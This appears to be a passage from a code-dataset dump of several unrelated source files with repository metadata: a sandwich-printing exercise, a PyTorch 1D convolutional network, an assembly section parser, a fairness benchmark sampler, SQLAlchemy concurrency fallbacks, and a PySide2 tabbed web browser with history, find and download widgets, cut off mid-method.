| 821 | 0 | 115 |
5dfad7fcfd22e1a7e1c32b2b0aa444c8a72724e9 | 258 | py | Python | Ene-Jun-2019/Luis Ornelas/Practica 1/8-12_Sandwiches.py | Arbupa/DAS_Sistemas | 52263ab91436b2e5a24ce6f8493aaa2e2fe92fb1 | [
"MIT"
] | 41 | 2017-09-26T09:36:32.000Z | 2022-03-19T18:05:25.000Z | Ene-Jun-2019/Luis Ornelas/Practica 1/8-12_Sandwiches.py | Arbupa/DAS_Sistemas | 52263ab91436b2e5a24ce6f8493aaa2e2fe92fb1 | [
"MIT"
] | 67 | 2017-09-11T05:06:12.000Z | 2022-02-14T04:44:04.000Z | Ene-Jun-2019/Luis Ornelas/Practica 1/8-12_Sandwiches.py | Arbupa/DAS_Sistemas | 52263ab91436b2e5a24ce6f8493aaa2e2fe92fb1 | [
"MIT"
] | 210 | 2017-09-01T00:10:08.000Z | 2022-03-19T18:05:12.000Z |
sandwich('Jamon','Queso','Lechuga','Toamte')
sandwich('Queso','Mantequilla')
sandwich('Tocino','Carne','Salsa BBQ') | 32.25 | 44 | 0.689922 | def sandwich(*ingredientes):
print("\nIngredientes del Sandwich:")
for ingrediente in ingredientes:
print("- " + ingrediente)
sandwich('Jamon','Queso','Lechuga','Toamte')
sandwich('Queso','Mantequilla')
sandwich('Tocino','Carne','Salsa BBQ') | 120 | 0 | 22 |
95de623b7ea65f9318deca27a11c31f4f6e0b8a5 | 5,237 | py | Python | physiossl/backbone/convnet.py | larryshaw0079/PhysioLearn | 6438924a1b2a0c2ce4c238f504654f9a7f993d9e | [
"MIT"
] | 2 | 2021-12-11T15:17:47.000Z | 2021-12-27T07:39:31.000Z | physiossl/backbone/convnet.py | larryshaw0079/PhysioSSL | 6438924a1b2a0c2ce4c238f504654f9a7f993d9e | [
"MIT"
] | null | null | null | physiossl/backbone/convnet.py | larryshaw0079/PhysioSSL | 6438924a1b2a0c2ce4c238f504654f9a7f993d9e | [
"MIT"
] | null | null | null | """
@Time : 2021/6/23 17:08
@File : convnet.py
@Software: PyCharm
@Desc :
"""
from typing import Union, List
import torch.nn as nn
class ResidualBlock1D(nn.Module):
"""
The basic block of the 1d residual convolutional network
"""
def __init__(self, in_channel, out_channel, kernel_size=7, stride=1):
"""
Args:
in_channel ():
out_channel ():
kernel_size ():
stride ():
"""
super(ResidualBlock1D, self).__init__()
# assert kernel_size % 2 == 1
self.layers = nn.Sequential(
nn.Conv1d(in_channel, out_channel, kernel_size=kernel_size, stride=stride, padding=kernel_size // 2,
bias=False),
nn.BatchNorm1d(out_channel),
nn.ReLU(inplace=True),
nn.Conv1d(out_channel, out_channel, kernel_size=kernel_size, stride=1, padding=kernel_size // 2,
bias=False),
nn.BatchNorm1d(out_channel)
)
self.downsample = nn.Sequential(
nn.Conv1d(in_channel, out_channel, kernel_size=1, stride=stride, bias=False),
nn.BatchNorm1d(out_channel)
)
self.relu = nn.ReLU(inplace=True)
def resnet_1d(in_channel: int, classes: int):
"""
Args:
in_channel ():
classes ():
Returns:
"""
return ConvNet1D(ResidualBlock1D, in_channel=in_channel, hidden_channel=16, kernel_size=[7, 11, 11, 7],
stride=[1, 2, 2, 2], num_layers=[2, 2, 2, 2], classes=classes)
def convnet_1d(in_channel: int, classes: int):
"""
Args:
in_channel ():
classes ():
Returns:
"""
return ConvNet1D(BasicConvBlock1D, in_channel=in_channel, hidden_channel=16, kernel_size=[7, 11, 11, 7],
stride=[1, 2, 2, 2], num_layers=[2, 2, 2, 2], classes=classes)
| 29.587571 | 120 | 0.573038 | """
@Time : 2021/6/23 17:08
@File : convnet.py
@Software: PyCharm
@Desc :
"""
from typing import Union, List
import torch.nn as nn
class ResidualBlock1D(nn.Module):
    """
    Basic 1-d residual block: two conv/batch-norm stages plus a 1x1
    projection shortcut, joined by an element-wise sum and a final ReLU.
    """
    def __init__(self, in_channel, out_channel, kernel_size=7, stride=1):
        """
        Args:
            in_channel (): number of input channels
            out_channel (): number of output channels
            kernel_size (): convolution kernel width (odd widths preserve length)
            stride (): stride of the first convolution (and of the shortcut)
        """
        super(ResidualBlock1D, self).__init__()
        pad = kernel_size // 2
        self.layers = nn.Sequential(
            nn.Conv1d(in_channel, out_channel, kernel_size=kernel_size,
                      stride=stride, padding=pad, bias=False),
            nn.BatchNorm1d(out_channel),
            nn.ReLU(inplace=True),
            nn.Conv1d(out_channel, out_channel, kernel_size=kernel_size,
                      stride=1, padding=pad, bias=False),
            nn.BatchNorm1d(out_channel),
        )
        # 1x1 projection so the shortcut matches the main path's shape.
        self.downsample = nn.Sequential(
            nn.Conv1d(in_channel, out_channel, kernel_size=1, stride=stride,
                      bias=False),
            nn.BatchNorm1d(out_channel),
        )
        self.relu = nn.ReLU(inplace=True)
    def forward(self, x):
        """Main path plus projected shortcut, then ReLU."""
        shortcut = self.downsample(x)
        out = self.layers(x) + shortcut
        return self.relu(out)
class BasicConvBlock1D(nn.Module):
    """Plain (non-residual) 1-d block: two conv -> batch-norm -> ReLU stages."""
    def __init__(self, in_channel, out_channel, kernel_size=7, stride=1):
        """
        Args:
            in_channel (): number of input channels
            out_channel (): number of output channels
            kernel_size (): convolution kernel width
            stride (): stride of the first convolution
        """
        super(BasicConvBlock1D, self).__init__()
        pad = kernel_size // 2
        stages = [
            nn.Conv1d(in_channel, out_channel, kernel_size=kernel_size,
                      stride=stride, padding=pad, bias=False),
            nn.BatchNorm1d(out_channel),
            nn.ReLU(inplace=True),
            nn.Conv1d(out_channel, out_channel, kernel_size=kernel_size,
                      stride=1, padding=pad, bias=False),
            nn.BatchNorm1d(out_channel),
            nn.ReLU(inplace=True),
        ]
        self.layers = nn.Sequential(*stages)
    def forward(self, x):
        """Apply both convolution stages."""
        return self.layers(x)
class ConvNet1D(nn.Module):
    """Generic 1-d convolutional classifier: a stem (conv 7/2 + max-pool),
    a stack of stages built from *basic_block* (channels double per stage),
    global average pooling, and a linear classification head."""
    def __init__(self, basic_block: nn.Module, in_channel: int, hidden_channel: int, kernel_size: Union[int, List[int]],
                 stride: Union[int, List[int]], num_layers: List[int], classes: int):
        """
        Args:
            basic_block (): block factory, called as block(in_ch, out_ch, k, s)
            in_channel (): channels of the input signal
            hidden_channel (): channel count produced by the stem
            kernel_size (): per-stage kernel size (a scalar is broadcast)
            stride (): per-stage stride of each stage's first block (scalar is broadcast)
            num_layers (): number of blocks per stage
            classes (): output class count
        """
        super(ConvNet1D, self).__init__()
        # Broadcast scalar hyper-parameters to one entry per stage.
        if isinstance(kernel_size, int):
            kernel_size = [kernel_size] * len(num_layers)
        if isinstance(stride, int):
            stride = [stride] * len(num_layers)
        assert len(kernel_size) == len(stride) == len(num_layers)
        self.head = nn.Sequential(
            nn.Conv1d(in_channel, hidden_channel, kernel_size=7, stride=2, padding=3, bias=False),
            nn.BatchNorm1d(hidden_channel),
            nn.ReLU(inplace=True),
            nn.MaxPool1d(kernel_size=3, stride=2, padding=1)
        )
        self.in_channel = hidden_channel
        conv_layers = []
        for i, nl in enumerate(num_layers):
            # Each stage doubles the channel count; __make_layer updates
            # self.in_channel as a side effect.
            conv_layers.append(self.__make_layer(basic_block, nl, self.in_channel * 2, kernel_size[i], stride[i]))
        self.conv_layers = nn.Sequential(*conv_layers)
        self.avg_pool = nn.AdaptiveAvgPool1d(1)
        self.fc = nn.Linear(self.in_channel, classes)
        # He initialization for convolutions, unit weight / zero bias for norms.
        for m in self.modules():
            if isinstance(m, nn.Conv1d):
                nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')
            elif isinstance(m, (nn.BatchNorm1d, nn.GroupNorm)):
                nn.init.constant_(m.weight, 1)
                nn.init.constant_(m.bias, 0)
    def __make_layer(self, block, num_blocks, out_channel, kernel_size, stride):
        # The first block of a stage may stride/downsample; the rest keep stride 1.
        layers = []
        layers.append(block(self.in_channel, out_channel, kernel_size, stride))
        self.in_channel = out_channel
        for _ in range(1, num_blocks):
            layers.append(block(self.in_channel, out_channel, kernel_size, 1))
        return nn.Sequential(*layers)
    def forward(self, x):
        """Classify a batch of shape (N, C, L); returns logits of shape (N, classes)."""
        out = self.head(x)
        out = self.conv_layers(out)
        out = self.avg_pool(out)
        # Bug fix: .squeeze() also dropped the batch dimension when N == 1;
        # flatten(1) always yields (N, C).
        out = out.flatten(1)
        out = self.fc(out)
        return out
def resnet_1d(in_channel: int, classes: int):
    """
    Build the standard 4-stage residual ConvNet1D (16 stem channels,
    two ResidualBlock1D blocks per stage).
    Args:
        in_channel (): channels of the input signal
        classes (): output class count
    Returns:
        a ConvNet1D built from ResidualBlock1D blocks
    """
    return ConvNet1D(ResidualBlock1D, in_channel=in_channel, hidden_channel=16, kernel_size=[7, 11, 11, 7],
                     stride=[1, 2, 2, 2], num_layers=[2, 2, 2, 2], classes=classes)
def convnet_1d(in_channel: int, classes: int):
    """
    Build the same 4-stage topology with plain (non-residual) blocks.
    Args:
        in_channel (): channels of the input signal
        classes (): output class count
    Returns:
        a ConvNet1D built from BasicConvBlock1D blocks
    """
    return ConvNet1D(BasicConvBlock1D, in_channel=in_channel, hidden_channel=16, kernel_size=[7, 11, 11, 7],
                     stride=[1, 2, 2, 2], num_layers=[2, 2, 2, 2], classes=classes)
| 694 | 2,574 | 73 |
c03436a7fad26632d614882809f30726de11f657 | 2,426 | py | Python | asm_section_list.py | PsiLupan/calcprogress | 05b77e1eedb7726c34f545e10837283e2a1c6180 | [
"MIT"
] | null | null | null | asm_section_list.py | PsiLupan/calcprogress | 05b77e1eedb7726c34f545e10837283e2a1c6180 | [
"MIT"
] | null | null | null | asm_section_list.py | PsiLupan/calcprogress | 05b77e1eedb7726c34f545e10837283e2a1c6180 | [
"MIT"
] | null | null | null | from os.path import basename
from enum import IntEnum
from re import search
from dataclasses import dataclass
from cw_map import Map
SECTION_REGEX = r"^\s*.section\s+(?P<Name>.[a-zA-Z0-9_$]+)"
@dataclass
@dataclass | 33.232877 | 108 | 0.609233 | from os.path import basename
from enum import IntEnum
from re import search
from dataclasses import dataclass
from cw_map import Map
SECTION_REGEX = r"^\s*.section\s+(?P<Name>.[a-zA-Z0-9_$]+)"
class AsmSectionType(IntEnum):
    """Discriminates code sections from data sections."""
    CODE = 0
    DATA = 1
def get_section_type(name: str) -> int:
    """Map an assembly section name to an AsmSectionType.

    Unknown names fall back to DATA (with a console warning), since an
    unrecognized section is almost always some unique piece of data.
    """
    code_sections = frozenset((".init", ".text"))
    data_sections = frozenset((
        "extab_", "extab", "._extab", "._exidx", "extabindex_",
        "extabindex", ".ctors", ".dtors", "._ctors", "._dtors",
        ".file", ".rodata", ".data", ".bss", ".sdata", ".sbss",
        ".sdata2", ".sbss2",
    ))
    if name in code_sections:
        return AsmSectionType.CODE
    if name in data_sections:
        return AsmSectionType.DATA
    # Failsafe for unidentifiable sections (like OGWS' ".file" section).
    print(f"Unidentifiable section! ({name})")
    print("Assuming this is a DATA section.")
    return AsmSectionType.DATA
def get_obj_name(path: str) -> str:
    """Return the object-file name for *path*: the base file name with its
    final extension (if any) replaced by ".o".

    Bug fix: for extensionless names, rfind(".") returned -1, and the
    original slices silently dropped the last character of the name.
    """
    file_name = basename(path)
    # Strip only the last extension ("foo.tar.gz" -> "foo.tar").
    dot_idx = file_name.rfind(".")
    if dot_idx != -1:
        file_name = file_name[:dot_idx]
    return f"{file_name}.o"
@dataclass
class AsmSection:
    """One section of an object file, reduced to the fields needed for
    progress accounting."""
    start: int  # virtual offset where the section begins
    size: int  # section size in bytes
    type: int  # an AsmSectionType value (CODE or DATA)
@dataclass
class AsmSectionList:
    """Collects an AsmSection record for every .section directive found in
    a set of assembly source files, using the DOL map for offsets/sizes."""
    sections: list[AsmSection]
    def __init__(self, sources: list[str], dol_map: Map):
        """Scan each file in *sources*, resolving sections via *dol_map*."""
        self.sections = []
        for file in sources:
            self.parse_file(file, dol_map)
    def parse_file(self, path: str, dol_map: Map):
        """Append one AsmSection per .section directive found in *path*."""
        # Read asm
        with open(path, "r") as f:
            asm = f.readlines()
        # Find sections in asm file by looking for .section directives
        for i in range(len(asm)):
            sect_match = search(SECTION_REGEX, asm[i])
            if sect_match != None:
                # Section name
                sect_name = sect_match.group("Name")
                # Header symbols in current object file
                my_file_headers = dol_map.headers[get_obj_name(path)]
                # Header symbol for current section
                my_header = my_file_headers[sect_name]
                # Create summable section object
                section = AsmSection(my_header.virt_ofs, my_header.size, get_section_type(sect_name))
                assert section.start > 0 and section.size >= 0
                self.sections.append(section) | 1,933 | 163 | 113 |
3f434402ab6b899eb8a437532d2a06a2478f1d60 | 420 | py | Python | python/verifair/benchmarks/fairsquare/M_ind_F_DT_V2_D2_N4_Q.py | obastani/verifair | 1d5efea041330fa9fe8d59d976bdd3ef97aff417 | [
"ECL-2.0",
"Apache-2.0"
] | 5 | 2019-11-05T20:40:40.000Z | 2020-09-16T03:13:54.000Z | python/verifair/benchmarks/fairsquare/M_ind_F_DT_V2_D2_N4_Q.py | obastani/verifair | 1d5efea041330fa9fe8d59d976bdd3ef97aff417 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | python/verifair/benchmarks/fairsquare/M_ind_F_DT_V2_D2_N4_Q.py | obastani/verifair | 1d5efea041330fa9fe8d59d976bdd3ef97aff417 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | from .helper import *
| 21 | 53 | 0.530952 | from .helper import *
def sample(flag):
age = gaussian(38.5816, 186.0614)
sex = step([(0,1,0.3307), (1,2,0.6693)])
capital_gain = gaussian(1077.6488, 54542539.1784)
sensitiveAttribute(sex < 1, flag)
qualified(age > 18)
if capital_gain >= 7073.5:
if age < 20:
t = 1
else:
t = 0
else:
t = 1
return int(t < 0.5)
fairnessTarget(t < 0.5)
| 374 | 0 | 23 |
50a21fa1ba0699c266edb93afac706ea38cec3d1 | 168 | py | Python | Ex110/teste.py | MoomenEltelbany/PythonDesafios | aa2f44d3104cf3607f58dc42c2f8fc8023f128de | [
"MIT"
] | null | null | null | Ex110/teste.py | MoomenEltelbany/PythonDesafios | aa2f44d3104cf3607f58dc42c2f8fc8023f128de | [
"MIT"
] | null | null | null | Ex110/teste.py | MoomenEltelbany/PythonDesafios | aa2f44d3104cf3607f58dc42c2f8fc8023f128de | [
"MIT"
] | null | null | null | import moeda
p = float(input("Digite um preço: R$"))
aum = int(input("Aumento de quantos %: "))
red = int(input('Reduzindo de quantos %: '))
moeda.resumo(p, aum, red)
| 24 | 44 | 0.654762 | import moeda
p = float(input("Digite um preço: R$"))
aum = int(input("Aumento de quantos %: "))
red = int(input('Reduzindo de quantos %: '))
moeda.resumo(p, aum, red)
| 0 | 0 | 0 |
5d15e06dec0ce3bc088257a379898cb0910aead0 | 1,911 | py | Python | ambiente_virtual/Lib/site-packages/sqlalchemy/util/concurrency.py | PI-UNIVESP-Penapolis/PRODEA | 1ced58f52bace8b6de0de3c6516b9fb7231da09c | [
"MIT"
] | 1 | 2021-09-22T13:14:37.000Z | 2021-09-22T13:14:37.000Z | ambiente_virtual/Lib/site-packages/sqlalchemy/util/concurrency.py | PI-UNIVESP-Penapolis/PRODEA | 1ced58f52bace8b6de0de3c6516b9fb7231da09c | [
"MIT"
] | 11 | 2021-10-01T01:23:13.000Z | 2021-10-09T23:40:39.000Z | ambiente_virtual/Lib/site-packages/sqlalchemy/util/concurrency.py | PI-UNIVESP-Penapolis/PRODEA | 1ced58f52bace8b6de0de3c6516b9fb7231da09c | [
"MIT"
] | 1 | 2021-11-28T07:12:08.000Z | 2021-11-28T07:12:08.000Z | from . import compat
have_greenlet = False
if compat.py3k:
try:
import greenlet # noqa F401
except ImportError:
pass
else:
have_greenlet = True
from ._concurrency_py3k import await_only
from ._concurrency_py3k import await_fallback
from ._concurrency_py3k import greenlet_spawn
from ._concurrency_py3k import is_exit_exception
from ._concurrency_py3k import AsyncAdaptedLock
from ._concurrency_py3k import _util_async_run # noqa F401
from ._concurrency_py3k import (
_util_async_run_coroutine_function,
) # noqa F401, E501
from ._concurrency_py3k import asyncio # noqa F401
from ._concurrency_py3k import asynccontextmanager
if not have_greenlet:
asyncio = None # noqa F811
| 29.859375 | 75 | 0.643642 | from . import compat
have_greenlet = False
if compat.py3k:
try:
import greenlet # noqa F401
except ImportError:
pass
else:
have_greenlet = True
from ._concurrency_py3k import await_only
from ._concurrency_py3k import await_fallback
from ._concurrency_py3k import greenlet_spawn
from ._concurrency_py3k import is_exit_exception
from ._concurrency_py3k import AsyncAdaptedLock
from ._concurrency_py3k import _util_async_run # noqa F401
from ._concurrency_py3k import (
_util_async_run_coroutine_function,
) # noqa F401, E501
from ._concurrency_py3k import asyncio # noqa F401
from ._concurrency_py3k import asynccontextmanager
if not have_greenlet:
asyncio = None # noqa F811
def _not_implemented():
    """Raise a descriptive error for async utilities that require greenlet."""
    # this conditional is to prevent pylance from considering
    # greenlet_spawn() etc as "no return" and dimming out code below it
    if have_greenlet:
        return None
    if not compat.py3k:
        raise ValueError("Cannot use this function in py2.")
    else:
        raise ValueError(
            "the greenlet library is required to use this function."
        )
# NOTE(review): in upstream SQLAlchemy these fallback definitions are nested
# under the ``if not have_greenlet:`` block; here they appear at module level,
# which would unconditionally shadow the greenlet-backed imports above —
# confirm against the upstream source.
def is_exit_exception(e):  # noqa F811
    # BaseException subclasses that are not Exception (KeyboardInterrupt,
    # SystemExit, ...) count as "exit" exceptions.
    return not isinstance(e, Exception)
def await_only(thing):  # noqa F811
    # Unusable without greenlet.
    _not_implemented()
def await_fallback(thing):  # noqa F81
    # Degenerates to the identity when greenlet is unavailable.
    return thing
def greenlet_spawn(fn, *args, **kw):  # noqa F81
    # Unusable without greenlet.
    _not_implemented()
def AsyncAdaptedLock(*args, **kw):  # noqa F81
    # Unusable without greenlet.
    _not_implemented()
def _util_async_run(fn, *arg, **kw):  # noqa F81
    # Synchronous fallback: just call the function directly.
    return fn(*arg, **kw)
def _util_async_run_coroutine_function(fn, *arg, **kw):  # noqa F81
    # Unusable without greenlet.
    _not_implemented()
def asynccontextmanager(fn, *arg, **kw):  # noqa F81
    # Unusable without greenlet.
    _not_implemented()
| 853 | 0 | 243 |
b591102aafffac7a88830c9091f7ea089ba3c7dd | 46,710 | py | Python | PythonPrograms/Dyn/Dynobite/Dynobite with Downloads.py | abhinavsatheesh/Python | 9ae1a7a040522f5989c34f17d2d0764b301fa23a | [
"Apache-2.0"
] | null | null | null | PythonPrograms/Dyn/Dynobite/Dynobite with Downloads.py | abhinavsatheesh/Python | 9ae1a7a040522f5989c34f17d2d0764b301fa23a | [
"Apache-2.0"
] | null | null | null | PythonPrograms/Dyn/Dynobite/Dynobite with Downloads.py | abhinavsatheesh/Python | 9ae1a7a040522f5989c34f17d2d0764b301fa23a | [
"Apache-2.0"
] | null | null | null | from tkPDFViewer import tkPDFViewer as pdf
from tkinter import *
from PySide2 import QtCore
from PySide2.QtCore import *
from PySide2.QtGui import *
from PySide2.QtWidgets import *
from PySide2.QtWebEngineWidgets import *
from PySide2 import QtCore
from functools import partial
import json
import validators
import sys
import os
_web_actions = [QWebEnginePage.Back, QWebEnginePage.Forward,
QWebEnginePage.Reload,
QWebEnginePage.Undo, QWebEnginePage.Redo,
QWebEnginePage.Cut, QWebEnginePage.Copy,
QWebEnginePage.Paste, QWebEnginePage.SelectAll]
# A Find tool bar (bottom area)
class DownloadWidget(QProgressBar):
"""Lets you track progress of a QWebEngineDownloadItem."""
finished = QtCore.Signal()
remove_requested = QtCore.Signal()
@staticmethod
@staticmethod
class BrowserTabWidget(QTabWidget):
"""Enables having several tabs with QWebEngineView."""
url_changed = QtCore.Signal(QUrl)
enabled_changed = QtCore.Signal(QWebEnginePage.WebAction, bool)
download_requested = QtCore.Signal(QWebEngineDownloadItem)
_url_role = Qt.UserRole + 1
# Default bookmarks as an array of arrays which is the form
# used to read from/write to a .json bookmarks file
_default_bookmarks = [
['Tool Bar'],
]
_bookmark_file = 'bookmarks.json'
# Create the model from an array of arrays
# Serialize model into an array of arrays, writing out the icons
# into .png files under directory in the process
# Bookmarks as a tree view to be used in a dock widget with
# functionality to persist and populate tool bars and menus.
class BookmarkWidget(QTreeView):
"""Provides a tree view to manage the bookmarks."""
open_bookmark = QtCore.Signal(QUrl)
open_bookmark_in_new_tab = QtCore.Signal(QUrl)
changed = QtCore.Signal()
# Synchronize the bookmarks under parent_item to a target_object
# like QMenu/QToolBar, which has a list of actions. Update
# the existing actions, append new ones if needed or hide
# superfluous ones
# Return a short title for a bookmark action,
# "Qt | Cross Platform.." -> "Qt"
@staticmethod
main_windows = []
cwd = os.getcwd()
DYNOBITEFILES = "Dynobite Files"
DynobiteCreateFolder = os.path.join(cwd, DYNOBITEFILES)
DynobiteHistoryFolder = os.path.join(DYNOBITEFILES, "History.txt")
print("Dynobite\nVersion 94.0.992.31")
try:
os.mkdir(DynobiteCreateFolder)
except FileExistsError:
pass
picturefolder = "Images"
completedir = os.path.join(DynobiteCreateFolder, picturefolder)
try:
os.mkdir(completedir)
url="https://raw.githubusercontent.com/abhinavsatheesh/dynfiles/main/Dynobite/Images/1.png"
downloadpath=completedir
download(url,f'{downloadpath}/1.png')
except FileExistsError:
pass
def create_main_window():
    """Creates a MainWindow sized to two-thirds of the available screen
    resolution, registers it in the module-level list and shows it."""
    main_win = MainWindow()
    # Keep a module-level reference so the window is not garbage-collected.
    main_windows.append(main_win)
    available_geometry = app.desktop().availableGeometry(main_win)
    main_win.resize(available_geometry.width() * 2 / 3,
                    available_geometry.height() * 2 / 3)
    main_win.show()
    return main_win
def create_main_window_with_browser():
"""Creates a MainWindow with a BrowserTabWidget."""
main_win = create_main_window()
return main_win.add_browser_tab()
class MainWindow(QMainWindow):
"""Provides the parent window that includes the BookmarkWidget,
BrowserTabWidget, and a DownloadWidget, to offer the complete
web browsing experience."""
if __name__ == '__main__':
app = QApplication(sys.argv)
main_win = create_main_window()
initial_urls = sys.argv[1:]
if not initial_urls:
initial_urls.append('https://www.google.com')
for url in initial_urls:
main_win.load_url_in_new_tab(QUrl.fromUserInput(url))
exit_code = app.exec_()
main_win.write_bookmarks()
sys.exit(exit_code)
| 37.97561 | 165 | 0.628709 | from tkPDFViewer import tkPDFViewer as pdf
from tkinter import *
from PySide2 import QtCore
from PySide2.QtCore import *
from PySide2.QtGui import *
from PySide2.QtWidgets import *
from PySide2.QtWebEngineWidgets import *
from PySide2 import QtCore
from functools import partial
import json
import validators
import sys
import os
_web_actions = [QWebEnginePage.Back, QWebEnginePage.Forward,
QWebEnginePage.Reload,
QWebEnginePage.Undo, QWebEnginePage.Redo,
QWebEnginePage.Cut, QWebEnginePage.Copy,
QWebEnginePage.Paste, QWebEnginePage.SelectAll]
class WebEngineView(QWebEngineView):
    """Web view that mirrors per-page QWebEnginePage.WebAction enabled state
    via ``enabled_changed`` and spawns new tabs/windows through injected
    factory callables."""
    enabled_changed = QtCore.Signal(QWebEnginePage.WebAction, bool)
    @staticmethod
    def web_actions():
        """Return the list of WebActions mirrored by this view."""
        return _web_actions
    @staticmethod
    def minimum_zoom_factor():
        # NOTE(review): minimum and maximum zoom both return 5, so the zoom
        # range is empty — the minimum was presumably meant to be smaller.
        return 5
    @staticmethod
    def maximum_zoom_factor():
        return 5
    def __init__(self, tab_factory_func, window_factory_func):
        """
        Args:
            tab_factory_func: zero-arg callable creating a new tab's view
            window_factory_func: zero-arg callable creating a new window's view
        """
        super(WebEngineView, self).__init__()
        self._tab_factory_func = tab_factory_func
        self._window_factory_func = window_factory_func
        page = self.page()
        # Map QAction -> WebAction so _enabled_changed can identify its sender.
        self._actions = {}
        for web_action in WebEngineView.web_actions():
            action = page.action(web_action)
            action.changed.connect(self._enabled_changed)
            self._actions[action] = web_action
    def is_web_action_enabled(self, web_action):
        """Return whether *web_action* is currently enabled on this page."""
        return self.page().action(web_action).isEnabled()
    def createWindow(self, window_type):
        """Qt hook: route new-tab requests to the tab factory, everything
        else to the window factory."""
        if (window_type == QWebEnginePage.WebBrowserTab or
            window_type == QWebEnginePage.WebBrowserBackgroundTab):
            return self._tab_factory_func()
        return self._window_factory_func()
    def _enabled_changed(self):
        # Slot for QAction.changed: re-emit as (WebAction, bool).
        action = self.sender()
        web_action = self._actions[action]
        self.enabled_changed.emit(web_action, action.isEnabled())
class HistoryModel(QAbstractTableModel):
    """Read-only two-column table model (title, URL) over a web history object."""
    def __init__(self, history, parent=None):
        super(HistoryModel, self).__init__(parent)
        self._history = history
    def headerData(self, section, orientation, role=Qt.DisplayRole):
        """Column headers: "Web Page" and "URL"."""
        if orientation == Qt.Horizontal and role == Qt.DisplayRole:
            return 'Web Page' if section == 0 else 'URL'
        return None
    def rowCount(self, index=QModelIndex()):
        """One row per history entry."""
        return self._history.count()
    def columnCount(self, index=QModelIndex()):
        """Fixed layout: title column and URL column."""
        return 2
    def item_at(self, model_index):
        """Return the history item behind *model_index*'s row."""
        return self._history.itemAt(model_index.row())
    def data(self, index, role=Qt.DisplayRole):
        """Display the page title (column 0) or URL string (column 1)."""
        item = self.item_at(index)
        column = index.column()
        if role == Qt.DisplayRole:
            return item.title() if column == 0 else item.url().toString()
        return None
    def refresh(self):
        """Force attached views to reload after the history changed."""
        self.beginResetModel()
        self.endResetModel()
class HistoryWindow(QTreeView):
    """Tree view over HistoryModel; emits ``open_url`` when an entry is activated."""
    open_url = Signal(QUrl)
    def __init__(self, history, parent):
        super(HistoryWindow, self).__init__(parent)
        self._model = HistoryModel(history, self)
        self.setModel(self._model)
        self.activated.connect(self._activated)
        # Size to a third of the screen hosting the parent window.
        screen = QApplication.desktop().screenGeometry(parent)
        self.resize(screen.width() / 3, screen.height() / 3)
        self._adjustSize()
    def refresh(self):
        """Reload the model and re-fit the title column."""
        self._model.refresh()
        self._adjustSize()
    def _adjustSize(self):
        # Only fit the title column when there is something to measure.
        if (self._model.rowCount() > 0):
            self.resizeColumnToContents(0)
    def _activated(self, index):
        # Double-click / Enter on a row opens that history entry.
        item = self._model.item_at(index)
        self.open_url.emit(item.url())
# A Find tool bar (bottom area)
class FindToolBar(QToolBar):
    """Find-in-page tool bar: search field, previous/next buttons,
    case-sensitivity toggle and a hide button (bound to Escape)."""
    find = QtCore.Signal(str, QWebEnginePage.FindFlags)
    def __init__(self):
        super(FindToolBar, self).__init__()
        self._line_edit = QLineEdit()
        self._line_edit.setClearButtonEnabled(True)
        self._line_edit.setPlaceholderText("Find...")
        self._line_edit.setMaximumWidth(300)
        # Pressing Return in the field searches forward.
        self._line_edit.returnPressed.connect(self._find_next)
        self.addWidget(self._line_edit)
        self._previous_button = QToolButton()
        style_icons = ':/qt-project.org/styles/commonstyle/images/'
        self._previous_button.setIcon(QIcon(style_icons + 'up-32.png'))
        self._previous_button.clicked.connect(self._find_previous)
        self.addWidget(self._previous_button)
        self._next_button = QToolButton()
        self._next_button.setIcon(QIcon(style_icons + 'down-32.png'))
        self._next_button.clicked.connect(self._find_next)
        self.addWidget(self._next_button)
        self._case_sensitive_checkbox = QCheckBox('Case Sensitive')
        self.addWidget(self._case_sensitive_checkbox)
        self._hideButton = QToolButton()
        self._hideButton.setShortcut(QKeySequence(Qt.Key_Escape))
        self._hideButton.setIcon(QIcon(style_icons + 'closedock-16.png'))
        self._hideButton.clicked.connect(self.hide)
        self.addWidget(self._hideButton)
    def focus_find(self):
        """Give keyboard focus to the search field."""
        self._line_edit.setFocus()
    def _emit_find(self, backward):
        # Emit the find signal with flags derived from the UI state;
        # empty search strings are ignored.
        needle = self._line_edit.text().strip()
        if needle:
            flags = QWebEnginePage.FindFlags()
            if self._case_sensitive_checkbox.isChecked():
                flags |= QWebEnginePage.FindCaseSensitively
            if backward:
                flags |= QWebEnginePage.FindBackward
            self.find.emit(needle, flags)
    def _find_next(self):
        """Search forward from the current position."""
        self._emit_find(False)
    def _find_previous(self):
        """Search backward from the current position."""
        self._emit_find(True)
class DownloadWidget(QProgressBar):
    """Lets you track progress of a QWebEngineDownloadItem.

    Shows a shortened file name with a percentage, keeps a descriptive
    tool tip up to date, and offers Launch/Show/Cancel/Remove actions
    through a context menu.
    """
    finished = QtCore.Signal()
    remove_requested = QtCore.Signal()
    def __init__(self, download_item):
        """Wire this widget to *download_item*'s progress/state/finish signals."""
        super(DownloadWidget, self).__init__()
        self._download_item = download_item
        download_item.finished.connect(self._finished)
        download_item.downloadProgress.connect(self._download_progress)
        # Bug fix: connect the slot itself. Previously the method was
        # *called* and its None return value was passed to connect(), so
        # state changes never refreshed the tool tip.
        download_item.stateChanged.connect(self._update_tool_tip)
        path = download_item.path()
        self.setMaximumWidth(300)
        # Shorten 'PySide2-5.11.0a1-5.11.0-cp36-cp36m-linux_x86_64.whl'...
        description = QFileInfo(path).fileName()
        description_length = len(description)
        if description_length > 30:
            description = '{}...{}'.format(description[0:10],
                                           description[description_length - 10:])
        self.setFormat('{} %p%'.format(description))
        self.setOrientation(Qt.Horizontal)
        self.setMinimum(0)
        self.setValue(0)
        self.setMaximum(100)
        self._update_tool_tip()
        # Force progress bar text to be shown on macOS by using 'fusion' style
        if sys.platform == 'darwin':
            self.setStyle(QStyleFactory.create('fusion'))
    @staticmethod
    def open_file(file):
        """Open *file* with the platform's default application."""
        QDesktopServices.openUrl(QUrl.fromLocalFile(file))
    @staticmethod
    def open_download_directory():
        """Open the user's download directory in the file manager."""
        path = QStandardPaths.writableLocation(QStandardPaths.DownloadLocation)
        DownloadWidget.open_file(path)
    def state(self):
        """Return the download item's current DownloadState."""
        return self._download_item.state()
    def _update_tool_tip(self):
        """Rebuild the tool tip: URL, local path, size (if known) and state."""
        path = self._download_item.path()
        tool_tip = "{}\n{}".format(self._download_item.url().toString(),
                                   QDir.toNativeSeparators(path))
        total_bytes = self._download_item.totalBytes()
        if total_bytes > 0:
            tool_tip += "\n{}K".format(total_bytes / 1024)
        state = self.state()
